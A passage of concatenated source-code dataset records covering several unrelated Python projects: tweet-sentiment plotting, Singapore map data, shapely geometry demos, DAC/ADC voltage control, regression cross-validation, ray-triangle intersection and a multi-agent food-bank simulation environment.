stop_words]\n filtered_sentence_desc = []\n for w_desc in word_tokens:\n if w_desc not in stop_words:\n filtered_sentence_desc.append(w_desc)\n\n # Remove characters which have length less than 2\n without_single_chr_desc = [\n word_desc for word_desc in filtered_sentence_desc if len(word_desc) > 2]\n\n # Remove numbers\n cleaned_data_desc = [\n word_desc for word_desc in without_single_chr_desc if not word_desc.isnumeric()]\n return (cleaned_data_desc)\n\n def getThirdGraph(self, data):\n top_N = 100\n word_dist_desc = nltk.FreqDist(data)\n rslt_desc = pd.DataFrame(word_dist_desc.most_common(top_N),\n columns=['Word', 'Frequency'])\n\n fig, ax = plt.subplots(figsize=(7, 5.5))\n fig.set_size_inches(10, 5)\n plt.figure(figsize=(10, 10))\n sns.set_style(\"whitegrid\")\n ax = sns.barplot(x=\"Word\", y=\"Frequency\", data=rslt_desc.head(10))\n plt.savefig(\"bar.png\")\n self.l1.setPixmap(QPixmap(QImage(\"bar.png\")))\n self.l1.setScaledContents(True)\n\n def getFourthGraph(self, list1, list2):\n N = len(list1)\n colors = np.random.rand(N)\n plt.figure(figsize=(10, 10))\n plt.scatter(list1, list2, c=colors, alpha=.2)\n plt.xlabel(\"Polarity\")\n plt.ylabel(\"Subjectivity\")\n plt.title(\"Polarity vs Subjectivity For Each Tweet\")\n plt.savefig(\"scatter.png\")\n self.l2.setPixmap(QPixmap(QImage(\"scatter.png\")))\n self.l2.setScaledContents(True)\n","repo_name":"JaquelinMG932/Senior-Project-2","sub_path":"mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":19708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72303740327","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\ndef getDatabase():\n \n \n region_db=[]\n masterPlan={'Name':'MASTER_PLAN',\n 'Description':'Master Plan 2019 Region Boundary (No Sea)',\n 'Remarks':'Converted from .kml to .shp',\n 'logoFile':'NA',\n 'shapeFile':'data/shapeFiles/masterPlan/master-plan-2019-region-boundary-no-sea-kml-polygon.shp',\n 'Source':'Urban Redevelopment Authority',\n 'LastUpdated':'13-08-2020',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n region_db.append(masterPlan)\n \n db_dict=[]\n mcd={'Name':'MCD',\n 'Description':'List of MCD outlets in Singapore',\n 'Remarks':'NA',\n 'logoFile':'data/logoFiles/MCD.png',\n 'shapeFile':'data/shapeFiles/mcd/mcd_gdf.shp',\n 'Source':'https://www.mcdonalds.com.sg/locate-us/',\n 'LastUpdated':'20-11-2021',\n 'License':'NA'\n }\n \n db_dict.append(mcd)\n \n library={'Name':'LIBRARY',\n 'Description':'List of Library location in Singapore',\n 'Remarks':'Converted from .kml to .shp',\n 'logoFile':'data/logoFiles/LIBRARY.png',\n 'shapeFile':'data/shapeFiles/library/libraries-point.shp',\n 'Source':'National Library Board',\n 'LastUpdated':'25-08-2021',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(library)\n \n museums={'Name':'MUSEUMS',\n 'Description':'List of Museums location in Singapore',\n 'Remarks':'Converted from .kml to .shp',\n 'logoFile':'data/logoFiles/MUSEUMS.png',\n 'shapeFile':'data/shapeFiles/museums/museums-kml-point.shp',\n 'Source':'National Heritage Board',\n 'LastUpdated':'24-01-2019',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(museums)\n \n e_waste={'Name':'E_WASTE',\n 'Description':'List of E-waste recycling near you',\n 'Remarks':'Converted from .kml to .shp',\n 'logoFile':'data/logoFiles/EWASTE.png',\n 'shapeFile':'data/shapeFiles/e_waste/e-waste-recycling-kml-point.shp',\n 'Source':'National Environment Agency',\n 'LastUpdated':'02-10-2021',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(e_waste)\n \n wireless_hs={'Name':'WIRELESS_HS',\n 'Description':'List of Wireless@SG hotspots in Singapore',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/HOTSPOT.png',\n 'shapeFile':'data/shapeFiles/wireless-hotspots/wireless-hotspots-geojson.shp',\n 'Source':'Infocomm Media Development Authority',\n 'LastUpdated':'22-03-2020',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(wireless_hs)\n \n \n waste_treatment={'Name':'WASTE_TREATMENT',\n 'Description':'Location of Toxic Industrial Wastes Treatment and Disposal Facilities',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/WASTE.png',\n 'shapeFile':'data/shapeFiles/waste-treatment/waste-treatment-geojson.shp',\n 'Source':'NATIONAL ENVIRONMENT AGENCY',\n 'LastUpdated':'22-03-2020',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(waste_treatment)\n \n monuments={'Name':'MONUMENTS',\n 'Description':'List of locations of monuments in Singapore',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/MONUMENTS.png',\n 'shapeFile':'data/shapeFiles/monuments/monuments-geojson.shp',\n 'Source':'National Heritage Board',\n 'LastUpdated':'24-01-2019',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(monuments)\n \n historic_sites={'Name':'HISTORIC_SITES',\n 'Description':'List of locations of Historic Sites in Singapore',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/HISTORIC.png',\n 'shapeFile':'data/shapeFiles/historic_sites/historic-sites-geojson.shp',\n 'Source':'National Heritage Board',\n 'LastUpdated':'24-01-2019',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(historic_sites)\n \n heritage_trees={'Name':'HERITAGE_TREES',\n 'Description':'List of locations of Heritage trees Sites in Singapore',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/HERITAGE.png',\n 'shapeFile':'data/shapeFiles/heritage_trees/heritage-trees-geojson.shp',\n 'Source':'NATIONAL PARKS BOARD',\n 'LastUpdated':'10-06-2020',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(heritage_trees)\n \n hawker_centres={'Name':'HAWKER_CENTRE',\n 'Description':'List of locations of Hawker Center in Singapore',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/HAWKER.png',\n 'shapeFile':'data/shapeFiles/hawker_centres/hawker-centres-geojson.shp',\n 'Source':'NATIONAL ENVIRONMENT AGENCY',\n 'LastUpdated':'03-09-2021',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(hawker_centres)\n \n dsa={'Name':'DSA',\n 'Description':'List of locations of Designated Smoking Areas (DSA)',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/DSA.png',\n 'shapeFile':'data/shapeFiles/dsa/designated-smoking-areas-geojson.shp',\n 'Source':'National Environment Agency',\n 'LastUpdated':'09-09-2021',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(dsa)\n \n \n cft={'Name':'CFT',\n 'Description':'List of locations of Cash For Trash stations near you',\n 'Remarks':'Converted from .geojson to .shp',\n 'logoFile':'data/logoFiles/CFT.png',\n 'shapeFile':'data/shapeFiles/cft/cash-for-trash-geojson.shp',\n 'Source':'NATIONAL ENVIRONMENT AGENCY',\n 'LastUpdated':'06-03-2021',\n 'License':'https://data.gov.sg/open-data-licence'\n }\n \n db_dict.append(cft)\n \n \n return region_db,db_dict\n\n\n# if __name__ == '__main__':\n\n# # db_dict=getDatabase()\n \n \n\n","repo_name":"koulakhilesh/imvoronoit","sub_path":"data/db_description.py","file_name":"db_description.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4850345701","text":"from matplotlib import pyplot\nfrom shapely.geometry import Point, LineString\nfrom descartes import PolygonPatch\nfrom shapely.ops import cascaded_union\n\n#from figures import SIZE, BLUE, GRAY\n\nfig = pyplot.figure(1,figsize=(10,10), dpi=90)\npolygons = []\na = Point(1, 1).buffer(1.5)\nb = Point(2, 1).buffer(1.5)\n# line to polygon!\nline = LineString([(0,0), (0,1), (0,2), (1,2),(3,3)])\npolygons.append(line.buffer(0.1))\nps = cascaded_union(polygons)\nprint(ps)\n# 1\nax = fig.add_subplot(121)\n\npatch1 = PolygonPatch(ps, fc=(0.10,0.10,0.10), ec=(0.10,0.10,0.10), alpha=0.2, zorder=1)\nax.add_patch(patch1)\npatch2 = PolygonPatch(b, fc=(0.10,0.10,0.10), ec=(0.10,0.10,0.10), alpha=0.2, zorder=1)\nax.add_patch(patch2)\nc = a.intersection(b)\npatchc = PolygonPatch(c, fc=(0,0,0.5), ec=(0,0,0.5), alpha=0.5, zorder=2)\nax.add_patch(patchc)\n\nax.set_title('a.intersection(b)')\n\nxrange = [-1, 4]\nyrange = [-1, 3]\nax.set_xlim(*xrange)\n# thx to https://stackoverflow.com/a/13318111/8862202\nax.set_xticks(list(range(*xrange)) + [xrange[-1]])\nax.set_ylim(*yrange)\nax.set_yticks(list(range(*yrange)) + [yrange[-1]])\nax.set_aspect(1)\n\n#2\nax = fig.add_subplot(122)\n\npatch1 = PolygonPatch(a, fc=(0.10,0.10,0.10), ec=(0.10,0.10,0.10), alpha=0.2, zorder=1)\nax.add_patch(patch1)\npatch2 = PolygonPatch(b, fc=(0.10,0.10,0.10), ec=(0.10,0.10,0.10), alpha=0.2, zorder=1)\nax.add_patch(patch2)\nc = a.symmetric_difference(b)\n\nif c.geom_type == 'Polygon':\n patchc = PolygonPatch(c, fc=(0,0,0.5), ec=(0,0,0.5), alpha=0.5, zorder=2)\n ax.add_patch(patchc)\nelif c.geom_type == 'MultiPolygon':\n for p in c:\n patchp = PolygonPatch(p, fc=(0,0,0.5), ec=(0,0,0.5), alpha=0.5, zorder=2)\n ax.add_patch(patchp)\n\nax.set_title('a.symmetric_difference(b)')\n\nxrange = [-1, 4]\nyrange = [-1, 3]\nax.set_xlim(*xrange)\n# thx to https://stackoverflow.com/a/13318111/8862202\nax.set_xticks(list(range(*xrange)) + [xrange[-1]])\nax.set_ylim(*yrange)\nax.set_yticks(list(range(*yrange)) + [yrange[-1]])\nax.set_aspect(1)\n\npyplot.show()\n\n","repo_name":"alexw92/master-thesis-semantic-segmentation","sub_path":"Map_Stuff/Intersect_Example.py","file_name":"Intersect_Example.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10328248319","text":"# Python script for user to set voltage.\n# Author: Andrew Schick and Daniel Lis\n# License: MIT License\n\nimport time\n\n#Import the module\nimport Adafruit_MCP4725\n\n#import the ADC module class\nimport mcp3428\nimport smbus\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg\n#create bus object \nbus = smbus.SMBus(1)\n#create a dictionary of addresses and information needed for the ADC instance\nkwargs = {'address': 0x68, 'mode': 0x10, 'sample_rate': 0x08, 'gain':0x00}\n\n#crate a ADC instance directing towards the bus with the addresses located in kwargs\nmcp3428 = mcp3428.MCP3428(bus, kwargs)\n\n# Create a DAC instance for the voltage input (DAC97) and the current max input\n# (DAC96)\ndac96 = Adafruit_MCP4725.MCP4725(address=0x60, busnum=1)\ndac97 = Adafruit_MCP4725.MCP4725(address=0x61, busnum=1)\n#Initialization of variables\n\n#How the readings change when they get read into and out of the ADC\nconversionVoltage= 300 * 1800/1709\nconversionCurrent= 3.3/10\n#DAC takes in a bit from 0 to 4095 since it is 12 bits\n#Initial Set to Bit is 0\nbitVoltage = 0\ndac97.set_voltage(bitVoltage) #set the voltage to zero through the dac instance\nbitCurrent = 0\ndac97.set_voltage(bitCurrent)\n#steps to follow\n#1. While loop that keeps on going through\n\nloopBool = int(input('1 or 0: do you want a loop?'))\n\nprint('\\r\\n')\nprint('-----------')\nprint('\\r\\n')\nprint ('Press ctrl-C to exit...')\n\n\nwhile loopBool == 0:\n bitVoltage = int(input('Enter Voltage Bit: '))\n bitCurrent = int(input('Enter Max Current bit: '))\n \n dac97.set_voltage(bitVoltage)\n dac96.set_voltage(bitCurrent)\n time.sleep(.1)\n print ('Setting Voltage to : ' + str(bitVoltage))\n print ('\\r\\n')\n print ('------------')\n print('\\r\\n')\n print ('Voltage: ' + str(mcp3428.take_single_reading(0)*conversionVoltage))\n print('\\r\\n')\n print('------------')\n print('\\r\\n')\n print('Setting Max Current to : ' + str(bitCurrent))\n print('\\r\\n')\n print('------------')\n print('\\r\\n')\n print('Current: ' + str(mcp3428.take_single_reading(1)*conversionCurrent))\n\nwhile loopBool == 1:\n voltages = np.zeros(4096)\n currents = np.zeros(4096)\n saveVoltage = 0\n saveCurrent = 0\n for i in range(4096):\n \n dac97.set_voltage(i)\n dac96.set_voltage(i)\n \n voltage = mcp3428.take_single_reading(0)\n current = mcp3428.take_single_reading(1)\n\n print(str(i) + ' ---> Voltage: ' + str(voltage) + ' | Current: ' + str(current))\n voltages[i] = float(voltage)\n currents[i] = float(current)\n\n \n bitRange = np.arange(4096)\n\n bitRange = bitRange[:,np.newaxis]\n mVolt,_,_,_ = np.linalg.lstsq(bitRange, voltages)\n mCurr,_,_,_ = np.linalg.lstsq(bitRange, currents)\n \n plt.figure(figsize=(6,2))\n\n plt.subplot(121)\n plt.plot(bitRange, voltages)\n plt.xlabel('bit')\n plt.ylabel('Reading')\n plt.title('Voltage Conversion: '+ str(mVolt))\n\n plt.subplot(122)\n plt.plot(bitRange, currents)\n plt.xlabel('bit')\n plt.ylabel('Reading')\n plt.title('Max Current Conversion: ' + str(mCurr))\n plt.show()\n break\n \n \n","repo_name":"UMassMENP/HVS_Project","sub_path":"DAC-ADC_Conversation.py","file_name":"DAC-ADC_Conversation.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36759085350","text":"#!/usr/bin/env python\n\nimport assignment1 as a1\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n(countries, features, values) = a1.load_unicef_data()\n\ntargets = values[:,1]\nx = values[:,7:]\nx = a1.normalize_data(x)\n\n\nN_TRAIN = 100\nx_train = x[0:N_TRAIN,:]\nx_test = x[N_TRAIN:,:]\nt_train = targets[0:N_TRAIN]\nt_test = targets[N_TRAIN:]\n\n# declear lambda\nlamda =[0,0.01,0.1,1,10,100,1000,10000]\n\n\n# Complete the linear_regression and evaluate_regression functions of the assignment1.py\n# Pass the required parameters to these functions\n\ntrain_err = {}\ntest_err = {}\nfor j in lamda:\n\n\ttrain_err_temp = 0\n\ttest_err_temp = 0\n\t\n\tfor i in range(0, 10):\n\t\t# start = (i-1)*10\n\t\t# end = i*10\n\t\t#print(start, end)\n\t\tvalidset = range(i * 10,(i * 10) + 10)\n\t\tvalid_x = x_train[np.arange(100),:] \n\t\tvalid_t = t_train[np.arange(100)]\n\t\tend = np.arange(i * 10,(i * 10) + 10)\n\t\tTrainDataindex = np.delete(np.arange(100),end)\n\t\treg_train_x = x_train[TrainDataindex,: ]\n\t\treg_train_t = t_train[TrainDataindex]\n\n\t\t# valid_x = x[start:end, :]\n\t\t# valid_t = targets[start:end]\n\t\t# reg_train_x = np.concatenate((x[:start, :], x[end:, :]), axis = 0)\n\t\t# reg_train_t = np.concatenate((targets[:start], targets[end:]), axis = 0)\n\n\n\t\t(w, tr_err) = a1.linear_regression(reg_train_x, reg_train_t, \"polynomial\", degree = 2, reg_lambda = j)\n\t\t(t_est, te_err) = a1.evaluate_regression(w, valid_x, valid_t, \"polynomial\", degree = 2)\n\t\t# print(w)\n\n\n\t\ttrain_err_temp += tr_err / 10\n\t\ttest_err_temp += te_err / 10\n\n\t# train_err_temp = train_err_temp / 10\n\t# test_err_temp = test_err_temp / 10\n\n\n\ttrain_err[j] = train_err_temp\n\ttest_err[j] = test_err_temp\nprint(list(test_err.values()))\n\n#result = list(test_err[0]).append(test_err)\n# Produce a plot of results.\nplt.rcParams.update({'font.size': 15})\n# plt.plot(list(train_err.keys()), list(train_err.values()))\n# plt.plot(list(test_err.keys()), list(test_err.values()))\n# plt.semilogx(list(train_err.keys()), list(train_err.values()))\nplt.semilogx(list(test_err.keys()), list(test_err.values()))\nplt.ylabel('Avg RMS')\nplt.legend(['CV error','Testing error'])\nplt.title('Fit with polynomials, no regularization')\nplt.xlabel('Polynomial degree')\nplt.show()\n","repo_name":"KeyG518/Linear-Regression","sub_path":"polynomial_regression_reg.py","file_name":"polynomial_regression_reg.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8184377431","text":"from typing import Optional, Tuple\n\nimport numpy as np\n\n\ndef compute_triangle_plane_normal(v0: np.ndarray, v1: np.ndarray, v2: np.ndarray) -> np.ndarray:\n \"\"\"Compute normal to plane spanned by triangle's 3 vertices.\n v2\n / \\\n / \\\n v0 --- v1\n\n Args:\n v0: (3,) array representing triangle vertex 0, ordered counter-clockwise (CCW).\n v1: (3,) array representing triangle vertex 1.\n v2: (3,) array representing triangle vertex 2.\n\n Returns:\n Unit length plane normal vector of shape (3,).\n \"\"\"\n assert all([v.dtype in [np.float32, np.float64] for v in [v0, v1, v2]])\n # compute plane's normal\n v0v1 = v1 - v0\n v0v2 = v2 - v0\n N = np.cross(v0v1, v0v2)\n N /= np.linalg.norm(N)\n return N\n\n\ndef inside_outside_test(N: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray, P: np.ndarray) -> bool:\n \"\"\"Determine whether a point on a 3d plane falls within a triangle's boundary.\n\n v2\n / \\\n / \\\n v0 --- v1\n\n C is a vector perpendicular to triangle's plane \n\n Args:\n N: (3,) array representing plane normal.\n v0: (3,) array representing triangle vertex 0, ordered counter-clockwise (CCW).\n v1: (3,) array representing triangle vertex 1.\n v2: (3,) array representing triangle vertex 2.\n P: (3,) array representing a point lying on the triangle's plane.\n\n Returns:\n Boolean indicating whether plane point falls within triangle.\n \"\"\"\n # edge 0\n edge0 = v1 - v0\n vp0 = P - v0\n C = np.cross(edge0, vp0)\n if N.dot(C) < 0:\n return False # P is on the right side\n\n # edge 1\n edge1 = v2 - v1\n vp1 = P - v1\n C = np.cross(edge1, vp1)\n if N.dot(C) < 0:\n return False # P is on the right side\n\n # edge 2\n edge2 = v0 - v2\n vp2 = P - v2\n C = np.cross(edge2, vp2)\n if N.dot(C) < 0:\n return False # P is on the right side\n\n return True\n\n\ndef inside_outside_test_vectorized(\n N: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray, Ps: np.ndarray\n) -> np.array:\n \"\"\"Determine whether multiple points on a 3d plane fall within a triangle's boundary.\n\n Args:\n N: (3,) array representing plane normal.\n v0: (3,) array representing triangle vertex 0, ordered counter-clockwise (CCW).\n v1: (3,) array representing triangle vertex 1.\n v2: (3,) array representing triangle vertex 2.\n Ps: (N,3) array representing points lying on the triangle's plane.\n Not necessarily within the triangle. These came from ray-plane intersection.\n\n Returns:\n Boolean array of shape (N,) indicating which plane points falls within the triangle.\n \"\"\"\n # edge 0\n edge0 = v1 - v0\n # edge 1\n edge1 = v2 - v1\n # edge 2\n edge2 = v0 - v2\n\n vp0 = Ps - v0\n vp1 = Ps - v1\n vp2 = Ps - v2\n\n C0 = np.cross(edge0, vp0)\n C1 = np.cross(edge1, vp1)\n C2 = np.cross(edge2, vp2)\n\n # if (dot product < 0), then P is on the right side\n return np.logical_and.reduce([C0.dot(N) >= 0, C1.dot(N) >= 0, C2.dot(N) >= 0])\n\n\ndef ray_triangle_intersect(\n origin: np.ndarray, ray_dir: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray\n) -> Tuple[bool, Optional[np.ndarray]]:\n \"\"\"Compute ray-triangle intersection, if such a intersection is possible.\n\n Args:\n origin: Array of shape (3,) representing ray origin.\n ray_dir: ray direction shape (3,)\n v0: (3,) array representing triangle vertex 0, ordered counter-clockwise (CCW).\n v1: (3,) array representing triangle vertex 1.\n v2: (3,) array representing triangle vertex 2.\n\n Returns:\n Boolean indicating whether valid intersection occurred.\n P: array of shape (3,) representing intersection point if exists, otherwise None.\n \"\"\"\n N = compute_triangle_plane_normal(v0, v1, v2)\n\n # Step 1: finding P\n # check if ray and plane are parallel ?\n NdotRayDirection = N.dot(ray_dir)\n kEpsilon = 1e-10\n if np.absolute(NdotRayDirection) < kEpsilon: # almost 0\n return False, None # they are parallel so they don't intersect !\n\n # compute d parameter of implicit line equation\n d = N.dot(v0)\n\n # compute t. t is the distance along the ray from the origin\n t = (d - N.dot(origin)) / NdotRayDirection\n # check if the triangle is in behind the ray\n if t < 0:\n return False, None # the triangle is behind\n\n # compute the intersection point using ray parameterization\n P = origin + t * ray_dir\n\n is_inside = inside_outside_test(N, v0, v1, v2, P)\n if not is_inside:\n return False, None\n\n return True, P # this ray hits the triangle\n\n\ndef ray_triangle_intersect_moller_trombore(\n origin: np.ndarray, ray_dir: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray\n) -> Tuple[bool, Optional[np.ndarray]]:\n \"\"\"Compute ray-triangle intersection using the Moller-Trombore algorithm, if such a intersection is possible.\n\n t is the distance along the ray from the origin\n\n Args:\n origin: shape (3,)\n ray_dir: ray direction shape (3,)\n v0: triangle vertex 0, ordered counter-clockwise (CCW)\n v1: triangle vertex 1\n v2: triangle vertex 2\n\n Returns:\n boolean indicating whether intersection is valid\n P: intersection point if exists, otherwise None\n \"\"\"\n v0v1 = v1 - v0\n v0v2 = v2 - v0\n pvec = np.cross(ray_dir, v0v2)\n det = v0v1.dot(pvec)\n\n # CULLING\n # if the determinant is negative the triangle is backfacing\n # if the determinant is close to 0, the ray misses the triangle\n kEpsilon = 1e-10\n if det < kEpsilon:\n return False, None\n\n invDet = 1 / det\n\n tvec = origin - v0\n u = tvec.dot(pvec) * invDet\n if (u < 0) or (u > 1):\n return False, None\n\n qvec = np.cross(tvec, v0v1)\n v = ray_dir.dot(qvec) * invDet\n if (v < 0) or (u + v > 1):\n return False, None\n\n t = v0v2.dot(qvec) * invDet\n\n P = origin + t * ray_dir\n return True, P\n\n\ndef ray_triangle_intersect_vectorized_moller_trombore(\n origin: np.ndarray, ray_dirs: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray\n) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Use Cramer's rule and Barycentric coordinates, per\n https://www.scratchapixel.com/lessons/3d-basic-rendering/ray-tracing-rendering-a-triangle/barycentric-coordinates\n\n Args:\n ray_dirs: N x 3 for directions of N ray\n\n Returns:\n valid: array of bool, whether hit or not\n Ps: array of intersection points, otherwise NULL values\n \"\"\"\n v0v1 = v1 - v0\n v0v2 = v2 - v0\n pvec = np.cross(ray_dirs, v0v2)\n det = pvec.dot(v0v1)\n\n # CULLING\n # if the determinant is negative the triangle is backfacing\n # if the determinant is close to 0, the ray misses the triangle\n kEpsilon = 1e-10\n # valid = det >= kEpsilon\n\n invDet = 1 / det\n\n tvec = origin - v0\n u = pvec.dot(tvec) * invDet\n\n # valid = np.logical_and.reduce(\n # \t[\n # \t\tu >= 0,\n # \t\tu <= 1,\n # \t\tvalid\n # \t])\n\n qvec = np.cross(tvec, v0v1)\n v = ray_dirs.dot(qvec) * invDet\n valid = np.logical_and.reduce(\n [\n det >= kEpsilon,\n u >= 0,\n u <= 1,\n v >= 0,\n u + v <= 1\n # valid\n ]\n )\n t = v0v2.dot(qvec) * invDet\n\n # compute the intersection point using ray parameterization\n # see broadcast example below (so last dims match for multiply)\n Ps = origin + (t * ray_dirs.T).T\n return valid, Ps\n\n\ndef ray_triangle_intersect_vectorized(\n origin: np.ndarray, ray_dirs: np.ndarray, v0: np.ndarray, v1: np.ndarray, v2: np.ndarray\n) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n\n Args:\n ray_dirs: N x 3 for directions of N ray\n\n Returns:\n valid: array of bool, whether hit or not\n Ps: array of intersection points, otherwise NULL values\n \"\"\"\n N = compute_triangle_plane_normal(v0, v1, v2)\n\n # Step 1: finding P\n # check if ray and plane are parallel ?\n NdotRayDirections = ray_dirs.dot(N)\n kEpsilon = 1e-10\n\n # if almost 0, they are parallel so they don't intersect !\n valid = np.absolute(NdotRayDirections) > kEpsilon\n\n # compute d parameter of implicit line equation\n d = N.dot(v0)\n\n DENOMINATOR_PADDING = 100\n NdotRayDirections[~valid] += DENOMINATOR_PADDING\n\n # compute t -- a vector of distances along the ray\n t = (d - N.dot(origin)) / NdotRayDirections\n\n # compute the intersection point using ray parameterization\n # see broadcast example below (so last dims match for multiply)\n Ps = origin + (t * ray_dirs.T).T\n\n is_inside = inside_outside_test_vectorized(N, v0, v1, v2, Ps)\n\n # check if the triangle is in behind the ray\n # if t < 0, then # the triangle is behind\n valid = np.logical_and.reduce([valid, t >= 0, is_inside])\n\n # if true, then # this ray hits the triangle\n return valid, Ps\n","repo_name":"johnwlambert/tbv","sub_path":"tbv/rendering/ray_triangle_intersection.py","file_name":"ray_triangle_intersection.py","file_ext":"py","file_size_in_byte":8935,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"1949385204","text":"import numpy as np\nimport enum\nimport copy\nimport logging\n\nfrom envs_pymarl.foodbank.food_situations import get_food_params\n\n# AGENTS_COUNT = 2\n# FOODS = [20, 20, 20]\n# NUM_FOODS = len(FOODS)\n# REQUESTS = [\n# [10, 10, 10],\n# [5, 10, 5],\n# [5, 5, 10],\n# ]\n\n\nclass EpisodeStatus(enum.IntEnum):\n ONGOING = 0\n COMPLETED = 1\n TIMEOUT = 2\n\n\nclass FoodAllocationEnv:\n \"\"\"\n The food allocation environment for decentralised multi-agent\n micromanagement scenarios in Food Bank.\n\n フードバンクにおけるマルチエージェント食品分配シミュレーション環境\n \"\"\"\n\n def __init__(\n self,\n full_observable,\n episode_limit,\n debug,\n situation_name,\n reward_mean_weight,\n reward_std_weight,\n reward_complete_bonus,\n reward_step_cost,\n seed,\n ):\n food_params = get_food_params(situation_name)\n\n self.n_agents = food_params[\"n_agents\"]\n\n self.n_foods = food_params[\"n_foods\"]\n self.requests = np.array(food_params[\"requests\"])\n self.initial_stock = np.array(food_params[\"initial_stock\"])\n\n self.reward_step_cost = reward_step_cost\n self.reward_mean_weight = reward_mean_weight\n self.reward_std_weight = reward_std_weight\n self.reward_complete_bonus = reward_complete_bonus\n\n self.episode_limit = episode_limit\n\n self.n_actions = self.n_foods + 1\n\n self._step_count = None\n # self._episode_count = 0\n\n self.full_observable = full_observable\n self.debug = debug\n\n self.timeouts = 0\n\n def reset(self, episode, test_mode=False, print_log=False):\n \"\"\"\n 環境を初期化\n エージェントの観測とグローバル状態を返す\n \"\"\"\n # タイムステップをリセット\n self._step_count = 0\n # バンクの在庫をリセット\n self.bank_stock = copy.deepcopy(self.initial_stock)\n # エージェントの在庫をリセット\n self.agents_stock = np.zeros((self.n_agents, self.n_foods))\n\n self.episode = episode\n\n # 終了フラグをリセット\n self.agents_done = [False for _ in range(self.n_agents)]\n\n # テストの際にログを残す\n self.debug = test_mode\n self.print_log = print_log\n\n # 最小残り個数を計算する\n # 食品ご��の要求の合計\n # requests_sum = np.sum(np.array(self.requests), axis=0)\n # 在庫 - 要求 (0以上の部分だけ足し合わせる)\n # leftover = self.initial_stock - requests_sum\n # self.ideal_min_leftover = np.sum((leftover > 0) * leftover)\n\n if self.print_log:\n logging.debug(\"\\n\\n\")\n logging.debug(\"Started Episode {}\".format(self.episode).center(60, \"*\"))\n logging.debug(\"Bank Stock\".center(60, \"-\"))\n logging.debug(self.bank_stock)\n logging.debug(\"Agent Stock\".center(60, \"-\"))\n for agent_i in range(self.n_agents):\n logging.debug(\"Agent{}: {}\".format(agent_i, self.agents_stock[agent_i]))\n logging.debug(\"Agent Request\".center(60, \"-\"))\n for agent_i in range(self.n_agents):\n logging.debug(\"Agent{}: {}\".format(agent_i, self.requests[agent_i]))\n\n return self.get_obs(debug=False), self.get_state()\n\n def step(self, agents_action):\n \"\"\"\n 行動を環境に出力してタイムステップを1つ進める\n\n -> [ 報酬, 終了フラグ, 追加情報(残り個数など) ]\n \"\"\"\n\n # 人数分の行動が入力されているかチェック\n assert len(agents_action) == self.n_agents\n # タイムステップを進める\n self._step_count += 1\n\n # エージェントごと\n for agent_i, action in enumerate(agents_action):\n # 行動を出力\n self.take_action(agent_i, action)\n\n status = self.check_status()\n\n reward = self.reward_step_cost\n terminated = False\n info = {\n \"completed\": False,\n \"timeout\": False,\n }\n\n # エピソード終了時に報酬を与える\n if status in (EpisodeStatus.COMPLETED, EpisodeStatus.TIMEOUT):\n agents_satisfaction = self.get_satisfaction()\n reward += self.get_reward(agents_satisfaction)\n\n for agent_i in range(self.n_agents):\n info.update(\n {\n \"agent{}_satisfaction\".format(agent_i): agents_satisfaction[\n agent_i\n ]\n }\n )\n info.update(\n {\n \"satisfaction_mean\": np.mean(agents_satisfaction),\n \"satisfaction_std\": np.std(agents_satisfaction),\n }\n )\n\n if self.print_log:\n logging.debug(\"TIMESTEP {}\".format(self._step_count).center(60, \"-\"))\n logging.debug(\"Actions\".center(60, \"-\"))\n logging.debug(\"Bank Stock\".center(60, \"-\"))\n logging.debug(self.bank_stock)\n logging.debug(\"Agent Stock\".center(60, \"-\"))\n for agent_i in range(self.n_agents):\n logging.debug(\"Agent{}: {}\".format(agent_i, self.agents_stock[agent_i]))\n\n if status is EpisodeStatus.COMPLETED:\n terminated = True\n reward += self.reward_complete_bonus\n info[\"completed\"] = True\n if self.print_log:\n logging.debug(\"Complete Bonus: {}\".format(self.reward_complete_bonus))\n logging.debug(\"Episode Completed.\")\n\n elif status is 